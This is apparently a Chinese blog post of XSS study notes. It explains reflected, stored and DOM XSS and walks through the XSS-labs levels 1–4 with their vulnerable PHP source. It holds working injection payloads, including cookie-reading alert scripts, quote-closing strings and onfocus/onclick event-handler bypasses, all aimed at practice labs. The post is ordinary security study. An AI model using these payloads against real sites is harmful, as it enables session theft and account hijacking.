

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="ZERO">
  <meta name="keywords" content="">
  
    <meta name="description" content="XSS靶场练题记录XSS简介XSS全称（Cross Site Scripting）跨站脚本攻击，为了避免和CSS（Cascading Style Sheet）层叠样式表名称冲突，所以改为了XSS，是最常见的Web应用程序安全漏洞之一，在2013年和2017年的OWASP Top 10分别位于第三名和第七名。 跨站脚本攻击是一种针对网站应用程序的安全漏洞攻击技术，是代码注入的一种。它允许恶意用户将代">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS漏洞学习笔记">
<meta property="og:url" content="http://example.com/2022/06/27/xss/index.html">
<meta property="og:site_name" content="ZERO&#39;s Blog">
<meta property="og:description" content="XSS靶场练题记录XSS简介XSS全称（Cross Site Scripting）跨站脚本攻击，为了避免和CSS（Cascading Style Sheet）层叠样式表名称冲突，所以改为了XSS，是最常见的Web应用程序安全漏洞之一，在2013年和2017年的OWASP Top 10分别位于第三名和第七名。 跨站脚本攻击是一种针对网站应用程序的安全漏洞攻击技术，是代码注入的一种。它允许恶意用户将代">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/3.jpg">
<meta property="article:published_time" content="2022-06-27T13:06:38.000Z">
<meta property="article:modified_time" content="2024-07-14T11:48:24.129Z">
<meta property="article:author" content="ZERO">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="XSS">
<meta property="article:tag" content="XSSlabs">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/3.jpg">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>XSS漏洞学习笔记 - ZERO&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":"G-C16YBJWRLK"},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=G-C16YBJWRLK", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', 'G-C16YBJWRLK');
        });
      }
    </script>
  

  

  

  

  



  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>ZERO&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/3.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="XSS漏洞学习笔记"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-06-27 21:06" pubdate>
          2022年6月27日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          41 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">XSS漏洞学习笔记</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="XSS靶场练题记录"><a href="#XSS靶场练题记录" class="headerlink" title="XSS靶场练题记录"></a>XSS靶场练题记录</h1><h2 id="XSS简介"><a href="#XSS简介" class="headerlink" title="XSS简介"></a><strong>XSS简介</strong></h2><p>XSS全称（Cross Site Scripting）跨站脚本攻击，为了避免和CSS（Cascading Style Sheet）层叠样式表名称冲突，所以改为了XSS，是最常见的Web应用程序安全漏洞之一，在2013年和2017年的OWASP Top 10分别位于第三名和第七名。</p>
<p>跨站脚本攻击是一种针对网站应用程序的安全漏洞攻击技术，是代码注入的一种。它允许恶意用户将代码注入网页(input表单、URL、留言版等位置)，其他用户在浏览网页时会受到影响，恶意用户利用xss代码攻击成功后，当用户或管理员浏览该页面时，嵌入 Web 里面的 Script 代码会被执行，从而达到恶意攻击的目的。</p>
<p>XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中，通过用户本地浏览器执行的，所以xss漏洞关键就是<strong>寻找参数未过滤的输出函数</strong></p>
<h2 id="XSS原理"><a href="#XSS原理" class="headerlink" title="XSS原理"></a>XSS原理</h2><p>服务器对用户提交的数据过滤不严，导致浏览器把用户的输入当成了JS代码并直接返回给客户端执行，从而实现<strong>对客户端的攻击</strong>目的</p>
<p>XSS属于客户端攻击，受害者最终是用户，但网站的相关管理人员也属于用户之一，这就意味着XSS也可能攻击到“服务端”，因为管理员的账号权限比普通用户的账号权限要大的多，一般管理员都可以对网站进行文件管理、数据管理等操作，而攻击者一般也是考管理员的身份作为“跳板”而进行实施攻击</p>
<p>XSS攻击最终目的是在网页中嵌入客户端恶意脚本代码，最常用的攻击代码语言是Javascript语言，但也可能会使用其他语言，例如：ActionScript、VBScript。但如今互联网客户端基本都是基于Javascript</p>
<h2 id="XSS漏洞的危害"><a href="#XSS漏洞的危害" class="headerlink" title="XSS漏洞的危害"></a>XSS漏洞的危害</h2><p>1.网络钓鱼，包括盗取各类用户账号 <a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1517803">https://cloud.tencent.com/developer/article/1517803</a></p>
<p>2.窃取用户cookies资料，从而获取用户隐私信息，或利用用户身份进一步对网站执行操作</p>
<p>3.劫持用户(浏览器)会话，从而执行任意操作，例如进行非法转账、强制发表日志、发送电子邮件等</p>
<p>4.特定条件下，可以网页挂马，进行恶意操作 <a target="_blank" rel="noopener" href="https://blog.csdn.net/Monsterlz123/article/details/91127385">https://blog.csdn.net/Monsterlz123/article/details/91127385</a></p>
<p>5.进行大量的客户端攻击，如DDoS攻击 <a target="_blank" rel="noopener" href="https://blog.csdn.net/wsnbbz/article/details/104652337">https://blog.csdn.net/wsnbbz/article/details/104652337</a></p>
<h2 id="XSS类型"><a href="#XSS类型" class="headerlink" title="XSS类型"></a>XSS类型</h2><p>XSS漏洞大概可以分为三个类型：反射型XSS、存储型XSS和DOM型XSS</p>
<h3 id="反射型-非持久化"><a href="#反射型-非持久化" class="headerlink" title="反射型(非持久化)"></a>反射型(非持久化)</h3><p>反射型XSS又称为非持久型XSS，这种攻击方式往往具有一次性。攻击者通过电子邮件或者聊天工具等将包含XSS代码的恶意链接发送给目标用户。当目标用户访问该链接时，服务器就收目标的请求并进行处理，然后把带有XSS代码的数据发送给目标用户的浏览器，浏览器会解析这段带有XSS代码的恶意脚本，就会触发XSS漏洞。</p>
<p><strong>注意！！！这里以pikachu漏洞练习平台为例</strong></p>
<p><strong>反射性XSS（get）</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs Python">Payload：<br>&lt;script&gt;alert(<span class="hljs-string">&#x27;xss&#x27;</span>)&lt;/script&gt;<br>注意：要注意alert()括号里面的写法，如字母xss，要加引号或/或反引号，数字不用<br><br>刚把payload放进输入框，还没submit就发现payload被截短了，应该是html代码中的限制<br>由于此处为get传参，所以有两个方法来进行绕过<br><br><span class="hljs-number">1.</span>直接在地址栏插入Payload<br><span class="hljs-number">2.</span>使用开发者工具，修改html代码中的长度限制<br><br>执行流程：<br>在输入点输入内容，构造恶意代码，输入点是以 GET 方式提交的<br>后端接受提交的数据，并没有对输入进行过滤<br>然后将其呈现给前端，浏览器执行恶意代码<br></code></pre></td></tr></table></figure>

<p><strong>反射性XSS（post）</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs Python">Payload：<br>&lt;script&gt;alert(<span class="hljs-string">&#x27;xss&#x27;</span>)&lt;/script&gt;<br>&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br></code></pre></td></tr></table></figure>

<h3 id="存储型XSS（持久化）"><a href="#存储型XSS（持久化）" class="headerlink" title="存储型XSS（持久化）"></a><strong>存储型XSS（持久化）</strong></h3><p>存储型XSS又称为持久性XSS，攻击脚本将被永久的存放在目标服务器的数据库或文件中，既有很高的隐蔽性。这种攻击手法多见于论坛、博客和留言板；攻击者在发帖的过程中，将恶意脚本和正常的信息一起注入帖子的内容中。帖子被服务器存储下来，恶意脚本也就会被存放在服务器的后端数据库中，当其他的用户浏览这个被注入了恶意脚本的帖子时，恶意脚本会在他们的浏览器中解析并执行。</p>
<p><strong>注意！！！这里以pikachu漏洞练习平台为例</strong></p>
<p><strong>存储型XSS</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs Python">Payload：<br>&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br><br>执行流程：<br>在留言板处输入内容，构造恶意代码<br>将输入的内容提交给后端代码执行，后端对输入过滤不严谨，然后执行插入的数据操作<br>此时，我们的恶意代码已经保存在数据库。不管何时何地何人查看这条留言，都会执行恶意代码，除非数据库中删除这条恶意代码(后面不管输入什么，结果都是一样的<br></code></pre></td></tr></table></figure>

<h3 id="DOM型XSS"><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h3><p><strong>DOM简介</strong></p>
<p>DOM全称Document Object Model，简单来说DOM文档就是一份XML文档，当有了DOM标准之后，DOM便将前端html代码化为一个树状结构，方便程序和脚本能够轻松的动态访问和更新这个树状结构的内容、结构以及样式，且不需要经过服务端</p>
<p><strong>DOM型XSS漏洞简介</strong></p>
<p>DOM型XSS执行场景跟之前两个不同，他是基于文档对象模型的漏洞，它可以动态的构造DOM节点。所以说，该漏洞是不经过后端代码的，直接构造恶意代码，即可在前端展示。用户请求一个专门设计的URL，它是由攻击者提交，而且其中包含XSS代码。服务器不会以任何的形式包含攻击者的脚本。当用户的浏览器处理这个响应时，DOM型对象就会处理XSS代码</p>
<p>所以说DOM型XSS可以在前端通过js渲染来完成数据的交互，达到插入数据造成XSS脚本攻击，且不经过服务器，所以即使抓包无无法抓取到这里的流量，而反射性与存储型xss需要与服务器交互，这便是三者的区别</p>
<p><strong>注意！！！这里以pikachu漏洞练习平台为例</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs Python">Payload：<br><span class="hljs-string">&#x27;&gt;&lt;img src=&quot;#&quot; onmouseover=&quot;alert(&#x27;</span>xss<span class="hljs-string">&#x27;)&quot;&gt;</span><br><span class="hljs-string">&#x27;</span>onclick=<span class="hljs-string">&quot;alert(&#x27;xss&#x27;)&quot;</span>&gt;<br><br>onmouseover需要鼠标划过，onclick需要鼠标点击<br></code></pre></td></tr></table></figure>

<h2 id="XSS-labs靶场部分题目练习"><a href="#XSS-labs靶场部分题目练习" class="headerlink" title="XSS-labs靶场部分题目练习"></a>XSS-labs靶场部分题目练习</h2><h3 id="Level1"><a href="#Level1" class="headerlink" title="Level1"></a>Level1</h3><p>查看网站源码，可以发现<strong>get传参name的值test插入了html里</strong>，还回显了payload的长度</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs PHP">Payload：<br>&lt;script&gt;<span class="hljs-title function_ invoke__">alert</span>()&lt;/script&gt;<br>&lt;!DOCTYPE html&gt;&lt;!--STATUS OK--&gt;&lt;html&gt;<br>&lt;head&gt;<br>&lt;meta http-equiv=<span class="hljs-string">&quot;content-type&quot;</span> content=<span class="hljs-string">&quot;text/html;charset=utf-8&quot;</span>&gt;<br>&lt;script&gt;<br>window.alert = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)  </span><br><span class="hljs-function"></span>&#123;     <br><span class="hljs-title function_ invoke__">confirm</span>(<span class="hljs-string">&quot;完成的不错！&quot;</span>);<br> window.location.href=<span class="hljs-string">&quot;level2.php?keyword=test&quot;</span>;   <span class="hljs-comment">//重定义alert函数，当调用alert时，会弹出confirm对话框并重定向到level2.php</span><br>&#125;<br>&lt;/script&gt;<br>&lt;title&gt;欢迎来到level1&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>&lt;h1 align=center&gt;欢迎来到level1&lt;/h1&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&quot;display_errors&quot;</span>, <span class="hljs-number">0</span>);<br><span class="hljs-variable">$str</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;name&quot;</span>];<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h2 align=center&gt;欢迎用户&quot;</span>.<span class="hljs-variable">$str</span>.<span class="hljs-string">&quot;&lt;/h2&gt;&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;center&gt;&lt;img src=level1.png&gt;&lt;/center&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h3 align=center&gt;payload的长度:&quot;</span>.<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$str</span>).<span class="hljs-string">&quot;&lt;/h3&gt;&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;/body&gt;<br>&lt;/html&gt;<br></code></pre></td></tr></table></figure>

<h3 id="Level2"><a href="#Level2" class="headerlink" title="Level2"></a>Level2</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs PHP">尝试输入Payload：<br>&lt;script&gt;<span class="hljs-title function_ invoke__">alert</span>()&lt;/script&gt;<br><br>没有成功，通过view-source查看源码<br>很明显，第一个test进行了html实体转义，但是第二个没有，我们只需要闭合掉双引号即可，构造payload<br><br>Payload：<br><span class="hljs-string">&quot;&gt;  &lt;script&gt;alert()&lt;/script&gt;  &lt;&quot;</span><br></code></pre></td></tr></table></figure>

<p>htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体。</p>
<p>预定义的字符是：</p>
<ul>
<li>&amp; （和号）成为 &amp;</li>
<li>“ （双引号）成为 “</li>
<li>‘ （单引号）成为 ‘</li>
<li>&lt; （小于）成为 &lt;</li>
<li>（大于）成为 &gt;</li>
</ul>
<p><strong>提示：</strong>要把特殊的 HTML 实体转换回字符，使用htmlspecialchars_decode()函数。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs PHP">&lt;!DOCTYPE html&gt;&lt;!--STATUS OK--&gt;&lt;html&gt;<br>&lt;head&gt;<br>&lt;meta http-equiv=<span class="hljs-string">&quot;content-type&quot;</span> content=<span class="hljs-string">&quot;text/html;charset=utf-8&quot;</span>&gt;<br>&lt;script&gt;<br>window.alert = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)  </span><br><span class="hljs-function"></span>&#123;     <br><span class="hljs-title function_ invoke__">confirm</span>(<span class="hljs-string">&quot;完成的不错！&quot;</span>);<br> window.location.href=<span class="hljs-string">&quot;level3.php?writing=wait&quot;</span>; <br>&#125;<br>&lt;/script&gt;<br>&lt;title&gt;欢迎来到level2&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>&lt;h1 align=center&gt;欢迎来到level2&lt;/h1&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&quot;display_errors&quot;</span>, <span class="hljs-number">0</span>);<br><span class="hljs-variable">$str</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;keyword&quot;</span>];<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h2 align=center&gt;没有找到和&quot;</span>.<span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$str</span>).<span class="hljs-string">&quot;相关的结果.&lt;/h2&gt;&quot;</span>.<span class="hljs-string">&#x27;&lt;center&gt;  //此处传入的值被htmlspecialchars进行了html实体转化</span><br><span class="hljs-string">&lt;form action=level2.php method=GET&gt;</span><br><span class="hljs-string">&lt;input name=keyword  value=&quot;&#x27;</span>.<span class="hljs-variable">$str</span>.<span class="hljs-string">&#x27;&quot;&gt;</span><br><span class="hljs-string">&lt;input type=submit name=submit value=&quot;搜索&quot;/&gt;</span><br><span class="hljs-string">&lt;/form&gt;</span><br><span class="hljs-string">&lt;/center&gt;&#x27;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;center&gt;&lt;img src=level2.png&gt;&lt;/center&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h3 align=center&gt;payload的长度:&quot;</span>.<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$str</span>).<span class="hljs-string">&quot;&lt;/h3&gt;&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;/body&gt;<br>&lt;/html&gt;<br></code></pre></td></tr></table></figure>

<h3 id="Level3"><a href="#Level3" class="headerlink" title="Level3"></a>Level3</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs PHP">尝试：<br>尝试输入<span class="hljs-number">123</span>，然后观察源码，发现相较于上一关，这边存在的是单引号的闭合，尝试Payload<br><span class="hljs-string">&#x27;&gt; &lt;script&gt;alert()&lt;/script&gt; &lt;&#x27;</span><br>未成功，观察源码可知，都被实体化了<br>针对这一情况可以采用onfocus事件来绕过<br><br>所以我们可以利用这个事件来绕过&lt;&gt;号的过滤已达到执行js的目的<br>Payload：<br><span class="hljs-string">&#x27; onfocus=alert() &#x27;</span>   不推荐<br><span class="hljs-string">&#x27; οnclick=alert() &#x27;</span>   推荐<br></code></pre></td></tr></table></figure>

<p>onfocus事件在元素获得焦点时触发，最常与 <input>、<select> 和 <a> 标签一起使用，以上面图片的html标签<input>为例，<input>标签是有输入框的，简单来说，onfocus事件就是当输入框被点击的时候，就会触发myFunction()函数，然后我们再配合javascript伪协议来执行javascript代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs PHP">&lt;!DOCTYPE html&gt;&lt;!--STATUS OK--&gt;&lt;html&gt;<br>&lt;head&gt;<br>&lt;meta http-equiv=<span class="hljs-string">&quot;content-type&quot;</span> content=<span class="hljs-string">&quot;text/html;charset=utf-8&quot;</span>&gt;<br>&lt;script&gt;<br>window.alert = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)  </span><br><span class="hljs-function"></span>&#123;     <br><span class="hljs-title function_ invoke__">confirm</span>(<span class="hljs-string">&quot;完成的不错！&quot;</span>);<br> window.location.href=<span class="hljs-string">&quot;level4.php?keyword=try harder!&quot;</span>; <br>&#125;<br>&lt;/script&gt;<br>&lt;title&gt;欢迎来到level3&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>&lt;h1 align=center&gt;欢迎来到level3&lt;/h1&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&quot;display_errors&quot;</span>, <span class="hljs-number">0</span>);<br><span class="hljs-variable">$str</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;keyword&quot;</span>];<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h2 align=center&gt;没有找到和&quot;</span>.<span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$str</span>).<span class="hljs-string">&quot;相关的结果.&lt;/h2&gt;&quot;</span>.<span class="hljs-string">&quot;&lt;center&gt;</span><br><span class="hljs-string">&lt;form action=level3.php method=GET&gt;</span><br><span class="hljs-string">&lt;input name=keyword  value=&#x27;&quot;</span>.<span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$str</span>).<span class="hljs-string">&quot;&#x27;&gt;        </span><br><span class="hljs-string">&lt;input type=submit name=submit value=搜索 /&gt;</span><br><span class="hljs-string">&lt;/form&gt;</span><br><span class="hljs-string">&lt;/center&gt;&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;center&gt;&lt;img src=level3.png&gt;&lt;/center&gt;<br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h3 align=center&gt;payload的长度:&quot;</span>.<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$str</span>).<span class="hljs-string">&quot;&lt;/h3&gt;&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br>&lt;/body&gt;<br>&lt;/html&gt;<br></code></pre></td></tr></table></figure>

<h3 id="Level4"><a href="#Level4" class="headerlink" title="Level4"></a>Level4</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs PHP">查看源码可知，这题和第三题基本一样，只不过这边是需要构造双引号进行闭合<br><br>Payload:<br><span class="hljs-string">&#x27; οnclick=alert() &#x27;</span>  <br></code></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs PHP">&lt;!DOCTYPE html&gt;&lt;!--STATUS OK--&gt;&lt;html&gt;<br>&lt;head&gt;<br>&lt;meta 